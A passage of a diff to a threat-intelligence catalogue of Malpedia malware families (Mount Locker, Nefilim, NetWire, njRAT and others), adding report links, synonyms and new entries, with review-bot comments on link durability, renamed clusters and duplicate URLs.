+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.moserpass",
+ "https://www.csis.dk/newsroom-blog-overview/2021/moserpass-supply-chain/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "0dc319a2-96b5-420d-85ec-07f34f457402",
+ "value": "Moserpass"
+ },
 {
 "description": "",
 "meta": {
@@ -21989,12 +25156,21 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.mount_locker",
+ "https://intel471.com/blog/how-cybercriminals-create-turbulence-for-the-transportation-industry",
+ "https://news.sophos.com/en-us/2021/03/31/sophos-mtr-in-real-time-what-is-astro-locker-team/",
 "https://blogs.blackberry.com/en/2020/12/mountlocker-ransomware-as-a-service-offers-double-extortion-capabilities-to-affiliates",
+ "https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/",
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-virtual-machines",
+ "https://www.bleepingcomputer.com/news/security/biotech-research-firm-miltenyi-biotec-hit-by-ransomware-data-leaked/",
 "https://www.bleepingcomputer.com/news/security/mount-locker-ransomware-joins-the-multi-million-dollar-ransom-game/",
 "https://www.bleepingcomputer.com/news/security/mount-locker-ransomware-now-targets-your-turbotax-tax-returns/",
- "https://www.bleepingcomputer.com/news/security/biotech-research-firm-miltenyi-biotec-hit-by-ransomware-data-leaked/",
- "https://dissectingmalwa.re/between-a-rock-and-a-hard-place-exploring-mount-locker-ransomware.html"
+ "https://kienmanowar.wordpress.com/2021/08/04/quicknote-mountlocker-some-pseudo-code-snippets/",
+ "https://dissectingmalwa.re/between-a-rock-and-a-hard-place-exploring-mount-locker-ransomware.html",
+ "https://chuongdong.com/reverse%20engineering/2021/05/23/MountLockerRansomware/",
+ "https://github.com/Finch4/Malware-Analysis-Reports/tree/main/MountLocker",
+ "https://www.guidepointsecurity.com/mount-locker-ransomware-steps-up-counter-ir-capabilities/"
 ],
 "synonyms": [],
 "type": []
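Review bot: The added `"https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3"` is a mutable, owner-controlled document rather than a published reference, and the same link is added again in the Nefilim and Nemty hunks below; the Google Drive links added for NetWire and Oski, and the `mp.weixin.qq.com/s/...` short links for NetWire, have the same problem. For a reference list that analysts pivot on, a Wayback Machine snapshot of the form the Neutrino hunk below already uses (`https://web.archive.org/web/<timestamp>/<url>`) would be more durable, or the underlying report it points to should be cited instead. The Mount Locker entry's `uuid` and `value` lines are outside the hunk.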
@@ -22044,7 +25220,7 @@
 "value": "MPKBot"
 },
 {
- "description": "",
+ "description": "Ransomware.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.mrdec",
@@ -22054,7 +25230,7 @@
 "type": []
 },
 "uuid": "1e301d67-cd12-4f46-bcb3-c60f9b78c4d0",
- "value": "MrDec Ransomware"
+ "value": "MrDec"
 },
 {
 "description": "",
@@ -22102,7 +25278,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.murofet",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf"
+ "https://www.wired.com/2017/03/russian-hacker-spy-botnet/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
+ "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group"
 ],
 "synonyms": [],
 "type": []
@@ -22128,6 +25306,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.mydogs",
+ "https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.html",
 "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html",
 "https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.htmlhttps://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html",
 "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-kimsuky-group-tracking-king-spearphishing/"
@@ -22196,6 +25375,19 @@
 "uuid": "98d375cb-f940-4bc7-a61e-f47bdcdc48e2",
 "value": "MyloBot"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mystery_snail",
+ "https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "c9b5b0b2-45af-43f2-8eb4-e13493c1342e",
+ "value": "MysterySnail"
+ },
 {
 "description": "",
 "meta": {
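Review bot: Shortening `"value": "MrDec Ransomware"` to `"value": "MrDec"` (and likewise Nefilim, Oni and OutCrypt further down) renames the cluster, and in MISP the galaxy tag attached to events is built from this textual value (`misp-galaxy:malpedia="MrDec Ransomware"`), so presumably tags already applied under the old name stop resolving to this cluster by name even though the uuid is unchanged. Keeping the previous name as a synonym, e.g. `"synonyms": ["MrDec Ransomware"]`, lets both forms keep matching; the Nefilim hunk does this only for the shortened "Nephilim", not for "Nefilim Ransomware". The MrDec entry's `synonyms` array is outside the hunk.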
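Review bot: The part-1 PwC URL added to the MyDogs refs sits directly above an existing context line that fuses the part-1 and part-2 URLs into one string (`...part-1.htmlhttps://www.pwc.co.uk/...part-2.html`); now that both halves are present as separate refs, the fused entry is a dead link and should be dropped in the same change. The line to remove is the one beginning `"https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.htmlhttps://`. The rest of the MyDogs entry is outside the hunk.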
@@ -22282,7 +25474,9 @@
 "https://securelist.com/analysis/publications/69953/the-naikon-apt/",
 "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
 ],
- "synonyms": [],
+ "synonyms": [
+ "Sacto"
+ ],
 "type": []
 },
 "uuid": "dfb745f1-600a-4d31-a3b0-57bd0a72ac2e",
@@ -22305,23 +25499,30 @@
 "https://medium.com/@mariohenkel/decrypting-nanocore-config-and-dump-all-plugins-f4944bfaba52",
 "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage",
 "https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire",
+ "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
 "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
 "https://blog.talosintelligence.com/2020/02/coronavirus-themed-malware.html",
 "https://www.zscaler.com/blogs/research/multistage-freedom-loader-used-spread-azorult-and-nanocore-rat",
+ "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html",
+ "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
 "https://medium.com/@mariohenkel/decrypting-nanocore-config-and-dump-all-plugins-f4944bfaba52?sk=00be46bc5bf99e8ab67369152ceb0332",
- "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
+ "https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html",
 "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
 "https://goggleheadedhacker.com/blog/post/11",
 "https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/image-file-trickery-part-ii-fake-icon-delivers-nanocore/",
 "https://www.secureworks.com/research/threat-profiles/cobalt-trinity",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
 "https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Win.Nanocore",
 "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/",
"https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/", + "https://securityintelligence.com/posts/roboski-global-recovery-automation/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/elfin-indictments-iran-espionage", "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", "https://malwareindepth.com/defeating-nanocore-and-cypherit/", "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", - "https://us-cert.cisa.gov/ncas/alerts/aa20-345a" + "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", + "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols" ], "synonyms": [ "Nancrat", @@ -22378,11 +25579,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.navrat", + "https://www.youtube.com/watch?v=rfzmHjZX70s", "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", "https://norfolkinfosec.com/how-to-analyzing-a-malicious-hangul-word-processor-document-from-a-dprk-threat-actor-group/", + "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf", "https://blog.talosintelligence.com/2018/05/navrat.html?m=1" ], - "synonyms": [], + "synonyms": [ + "JinhoSpy" + ], "type": [] }, "uuid": "ec0cad2c-0c13-491a-a869-1dc1758c8872", 
@@ -22394,10 +25599,11 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.ncctrojan",
 "https://www.youtube.com/watch?v=1WfPlgtfWnQ",
- "https://insight-jp.nttsecurity.com/post/102gr6l/ta428ncctrojan",
+ "https://vblocalhost.com/uploads/VB2020-20.pdf",
 "https://sebdraven.medium.com/actor-behind-operation-lagtime-targets-russia-f8c277dc52a9",
- "https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf",
- "https://vblocalhost.com/uploads/VB2020-20.pdf"
+ "https://twitter.com/ESETresearch/status/1441139057682104325?s=20",
+ "https://insight-jp.nttsecurity.com/post/102gr6l/ta428ncctrojan",
+ "https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -22405,6 +25611,21 @@
 "uuid": "85056c54-f8f1-4a98-93cb-322cc1deb52c",
 "value": "nccTrojan"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nebulae",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/396/Bitdefender-PR-Whitepaper-NAIKON-creat5397-en-EN.pdf",
+ "https://twitter.com/SyscallE/status/1390339497804636166",
+ "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "76c75ed0-95ba-4393-8020-4400bdc49de6",
+ "value": "Nebulae"
+ },
 {
 "description": "",
 "meta": {
@@ -22412,6 +25633,7 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.necurs",
 "https://blog.avast.com/botception-with-necurs-botnet-distributes-script-with-bot-capabilities-avast-threat-labs",
 "https://www.bitsighttech.com/blog/necurs-proxy-module-with-ddos-features",
+ "http://www.secureworks.com/research/threat-profiles/gold-riverview",
 "http://blog.talosintelligence.com/2017/03/necurs-diversifies.html",
 "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
 "https://www.blueliv.com/wp-content/uploads/2018/07/Blueliv-Necurs-report-2017.pdf",
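Review bot: The added `"http://www.secureworks.com/research/threat-profiles/gold-riverview"` duplicates the `https://` form of the same URL that already opens the next hunk of this same Necurs refs array, so the entry now cites one reference twice under two schemes; drop the added line, or keep only the https form. The same plain-`http://` scheme is used for the secureworks gold-mansard links added in the Nefilim and Nemty hunks below, while every other secureworks ref visible in the file is https, so those are worth normalizing too. The Necurs refs array continues past both hunks.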
@@ -22422,6 +25644,7 @@
 "https://www.secureworks.com/research/threat-profiles/gold-riverview",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/the-new-face-of-necurs-noteworthy-changes-to-necurs-behaviors",
 "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
+ "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much",
 "https://blogs.microsoft.com/on-the-issues/2020/03/10/necurs-botnet-cyber-crime-disrupt/",
 "https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/",
 "https://cofense.com/necurs-targeting-banks-pub-file-drops-flawedammyy/",
@@ -22454,31 +25677,40 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.nefilim",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf",
 "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/",
+ "https://www.bleepingcomputer.com/news/security/home-appliance-giant-whirlpool-hit-in-nefilim-ransomware-attack/",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion",
+ "https://www.trendmicro.com/en_us/research/21/b/nefilim-ransomware.html",
 "https://www.picussecurity.com/resource/blog/how-to-beat-nefilim-ransomware-attacks",
- "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
+ "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
+ "https://intel471.com/blog/how-cybercriminals-create-turbulence-for-the-transportation-industry",
+ "https://securelist.com/evolution-of-jsworm-ransomware/102428/",
+ "https://documents.trendmicro.com/assets/white_papers/wp-modern-ransomwares-double-extortion-tactics.pdf",
+ "https://www.cert.govt.nz/it-specialists/advisories/active-ransomware-campaign-leveraging-remote-access-technologies/",
+ "https://www.trendmicro.com/en_us/research/21/f/nefilim-modern-ransomware-attack-story.html",
+ "http://www.secureworks.com/research/threat-profiles/gold-mansard",
+ "https://blog.qualys.com/vulnerabilities-research/2021/05/12/nefilim-ransomware",
 "https://www.bleepingcomputer.com/news/security/new-nefilim-ransomware-threatens-to-release-victims-data/",
 "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html",
 "https://news.sophos.com/en-us/2021/01/26/nefilim-ransomware-attack-uses-ghost-credentials/",
 "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
-
"https://www.trendmicro.com/en_us/research/21/b/nefilim-ransomware.html", - "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", + "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/", + "https://labs.sentinelone.com/meet-nemty-successor-nefilim-nephilim-ransomware/", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", + "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", "https://id-ransomware.blogspot.com/2020/03/nefilim-ransomware.html", "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", - "https://www.bleepingcomputer.com/news/security/home-appliance-giant-whirlpool-hit-in-nefilim-ransomware-attack/", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/nefilim-ransomware-threatens-to-expose-stolen-data", - "https://www.cert.govt.nz/it-specialists/advisories/active-ransomware-campaign-leveraging-remote-access-technologies/", - "https://labs.sentinelone.com/meet-nemty-successor-nefilim-nephilim-ransomware/" + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/nefilim-ransomware-threatens-to-expose-stolen-data" ], "synonyms": [ - "Nephilim Ransomware" + "Nephilim" ], "type": [] }, "uuid": "895f088e-a862-462c-a754-6593c6a471da", - "value": "Nefilim Ransomware" + "value": "Nefilim" }, { "description": "", 
@@ -22501,23 +25733,28 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.nemty",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/nemty-ransomware-trik-botnet",
 "https://www.bleepingcomputer.com/news/security/fake-paypal-site-spreads-nemty-ransomware/",
- "https://www.fortinet.com/blog/threat-research/nemty-ransomware-early-stage-threat.html",
 "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://www.bleepingcomputer.com/news/security/nemty-ransomware-gets-distribution-from-rig-exploit-kit/",
 "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/nemty-ransomware-learning-by-doing/",
- "https://www.bleepingcomputer.com/news/security/nemty-ransomware-decryptor-released-recover-files-for-free/",
- "https://raw.githubusercontent.com/k-vitali/Malware-Misc-RE/master/2019-08-24-nemty-ransomware-notes.vk.raw",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
 "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://www.tesorion.nl/nemty-update-decryptors-for-nemty-1-5-and-1-6/",
- "https://www.bleepingcomputer.com/news/security/new-nemty-ransomware-may-spread-via-compromised-rdp-connections/",
 "https://www.lastline.com/labsblog/nemty-ransomware-scaling-up-apac-mailboxes-swarmed-dual-downloaders/",
- "https://github.com/albertzsigovits/malware-notes/blob/master/Nemty.md",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://securelist.com/evolution-of-jsworm-ransomware/102428/",
+ "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
+
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://www.bleepingcomputer.com/news/security/new-nemty-ransomware-may-spread-via-compromised-rdp-connections/", + "http://www.secureworks.com/research/threat-profiles/gold-mansard", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/nemty-ransomware-trik-botnet", + "https://www.bleepingcomputer.com/news/security/nemty-ransomware-gets-distribution-from-rig-exploit-kit/", + "https://raw.githubusercontent.com/k-vitali/Malware-Misc-RE/master/2019-08-24-nemty-ransomware-notes.vk.raw", + "https://medium.com/csis-techblog/the-nemty-affiliate-model-13f5cf7ab66b", + "https://www.fortinet.com/blog/threat-research/nemty-ransomware-early-stage-threat.html", "https://labs.sentinelone.com/meet-nemty-successor-nefilim-nephilim-ransomware/", - "https://medium.com/csis-techblog/the-nemty-affiliate-model-13f5cf7ab66b" + "https://github.com/albertzsigovits/malware-notes/blob/master/Nemty.md", + "https://www.bleepingcomputer.com/news/security/nemty-ransomware-decryptor-released-recover-files-for-free/", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://www.tesorion.nl/nemty-update-decryptors-for-nemty-1-5-and-1-6/" ], "synonyms": [], "type": [] 
@@ -22587,6 +25824,23 @@
 "uuid": "3bb8052e-8ed2-48e3-a2cf-7358bae8c6b5",
 "value": "NETEAGLE"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.netfilter",
+ "https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/",
+ "https://www.gdatasoftware.com/blog/microsoft-signed-a-malicious-netfilter-rootkit",
+ "https://blog.360totalsecurity.com/en/netfilter-rootkit-ii-continues-to-hold-whql-signatures/",
+ "https://www.intezer.com/blog/malware-analysis/fast-insights-for-a-microsoft-signed-netfilter-rootkit/",
+ "https://www.vice.com/en/article/pkbzxv/hackers-tricked-microsoft-into-certifying-malware-that-could-spy-on-users"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "731d992c-f2e0-4e56-a148-b8df5caee8e3",
+ "value": "NetfilterRootkit"
+ },
 {
 "description": "",
 "meta": {
@@ -22668,28 +25922,42 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.netwire",
+ "https://blog.talosintelligence.com/2021/09/operation-armor-piercer.html",
 "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf",
 "https://www.circl.lu/pub/tr-23/",
 "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors",
+ "https://blogs.blackberry.com/en/2021/09/threat-thursday-netwire-rat-is-coming-down-the-line",
 "https://news.drweb.ru/show/?i=13281&c=23",
 "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/",
 "https://news.sophos.com/en-us/2020/07/14/raticate-rats-as-service-with-commercial-crypter/?cmp=30728",
 "https://maskop9.wordpress.com/2019/01/30/analysis-of-netwiredrc-trojan/",
 "https://www.amnesty.org/en/latest/research/2020/06/india-human-rights-defenders-targeted-by-a-coordinated-spyware-operation/",
 "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage",
+ "https://mp.weixin.qq.com/s/yrDzybPVTbu_9SrZPlSNKA",
 "https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire",
+ "https://www.zscaler.com/blogs/security-research/look-hydrojiin-campaign",
 "https://www.secureworks.com/blog/netwire-rat-steals-payment-card-data",
 "https://blog.vincss.net/2020/03/re011-unpack-crypter-cua-malware-netwire-bang-x64dbg.html",
+ "https://mp.weixin.qq.com/s/xUM2x89GuB8uP6otN612Fg",
+ "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
 "http://researchcenter.paloaltonetworks.com/2014/08/new-release-decrypting-netwire-c2-traffic/",
+ "https://drive.google.com/file/d/1dD2sWYES_hrPsoql4G0aVF9ILIxAS4Fd/view",
+ "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
 "https://decoded.avast.io/adolfstreda/the-tangle-of-wiryjmpers-obfuscation/",
+ "https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html",
"https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", "https://news.sophos.com/en-us/2020/05/14/raticate/", + "https://yoroi.company/research/new-cyber-operation-targets-italy-digging-into-the-netwire-attack-chain/", "https://context-cdn.washingtonpost.com/notes/prod/default/documents/b19a6f2e-55a1-4915-9c2d-5fae0110418c/note/b463d38b-2384-4bb0-a94b-b1b17223ffd0.", + "https://www.cybereason.com/blog/cybereason-exposes-malware-targeting-us-taxpayers", "https://www.secureworks.com/research/threat-profiles/cobalt-trinity", + "https://securityintelligence.com/posts/roboski-global-recovery-automation/", + "https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader", "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", - "http://blog.talosintelligence.com/2017/12/recam-redux-deconfusing-confuserex.html" + "http://blog.talosintelligence.com/2017/12/recam-redux-deconfusing-confuserex.html", + "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols" ], "synonyms": [ "NetWeird", 
@@ -22727,6 +25995,7 @@
 "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/",
 "https://blog.malwarebytes.com/threat-analysis/2015/08/inside-neutrino-botnet-builder/",
 "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet",
+ "https://web.archive.org/web/20191223034907/http://blog.ptsecurity.com/2019/08/finding-neutrino.html",
 "https://blog.malwarebytes.com/threat-analysis/2017/02/new-neutrino-bot-comes-in-a-protective-loader/",
 "https://blog.malwarebytes.com/cybercrime/2017/01/post-holiday-spam-campaign-delivers-neutrino-bot/",
 "http://blog.trendmicro.com/trendlabs-security-intelligence/credit-card-scraping-kasidet-builder-leads-to-spike-in-detections/",
@@ -22821,6 +26090,7 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.new_ct",
 "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf",
+ "http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf",
 "https://www.secureworks.com/research/threat-profiles/bronze-express"
 ],
 "synonyms": [
@@ -22915,6 +26185,23 @@
 "uuid": "e1fb348b-5e2b-4a26-95af-431065498ff5",
 "value": "Nitol"
 },
+ {
+ "description": "Ransomware family which requires payment in Discord gift cards (\"Discord Nitro\").",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nitro",
+ "https://github.com/nightfallgt/nitro-ransomware",
+ "https://twitter.com/malwrhunterteam/status/1430616882231578624",
+ "https://www.bleepingcomputer.com/news/security/discord-nitro-gift-codes-now-demanded-as-ransomware-payments/"
+ ],
+ "synonyms": [
+ "Hydra"
+ ],
+ "type": []
+ },
+ "uuid": "a81635fc-7bb7-4cd1-b26c-ea8ce6cb2763",
+ "value": "win.nitro"
+ },
 {
 "description": "",
 "meta": {
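Review bot: `"value": "win.nitro"` in the new Nitro entry uses the Malpedia slug as the cluster name, whereas every other `value` in the file and in this commit (`"MysterySnail"`, `"Nebulae"`, `"NetfilterRootkit"`) is the human-readable family name, and the slug is already carried by the first ref URL. Suggest `"value": "Nitro"`; since the commit moves the word "Ransomware" out of `value` into `description` for MrDec, Oni and OutCrypt, the description here already covers that. The synonym `"Hydra"` is a name shared by unrelated families in this kind of catalogue, so it may be worth confirming it is specific enough to be a useful alias.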
@@ -22934,36 +26221,53 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat",
 "https://asec.ahnlab.com/1369",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
 "https://github.com/itsKindred/malware-analysis-writeups/blob/master/bashar-bachir-chain/bashar-bachir-analysis.pdf",
 "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
 "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/",
 "https://www.vectra.ai/blogpost/moonlight-middle-east-targeted-attacks",
+ "https://blog.talosintelligence.com/2021/07/sidecopy.html",
 "http://blog.trendmicro.com/trendlabs-security-intelligence/new-rats-emerge-from-leaked-njw0rm-source-code/",
 "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/",
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/592/original/Hashes_IOCs_for_coverage.txt",
 "https://blog.nviso.eu/2020/09/01/epic-manchego-atypical-maldoc-delivery-brings-flurry-of-infostealers/",
 "https://www.4hou.com/posts/VoPM",
 "https://blog.sonatype.com/bladabindi-njrat-rat-in-jdb.js-npm-malware",
+ "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html",
 "https://blogs.360.cn/post/APT-C-44.html",
 "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/",
 "https://www.secureworks.com/research/threat-profiles/copper-fieldstone",
 "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
+ "https://blog.talosintelligence.com/2021/09/operation-layover-how-we-tracked-attack.html",
 "http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered-1.pdf",
 "https://unit42.paloaltonetworks.com/njrat-pastebin-command-and-control",
"https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf", "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", + "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", "https://malwr-analysis.com/2020/06/21/njrat-malware-analysis/", "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://www.seqrite.com/documents/en/white-papers/Whitepaper-OperationSideCopy.pdf", "https://news.sophos.com/en-us/2020/05/14/raticate/", "https://securelist.com/apt-trends-report-q2-2019/91897/", "http://blogs.360.cn/post/analysis-of-apt-c-37.html", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt", "https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g", + "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html", + "https://labs.k7computing.com/?p=21904", "https://www.trendmicro.com/en_us/research/20/i/wind-up-windscribe-vpn-bundled-with-backdoor.html", "https://blog.fortinet.com/2016/11/30/bladabindi-remains-a-constant-threat-by-using-dynamic-dns-services", 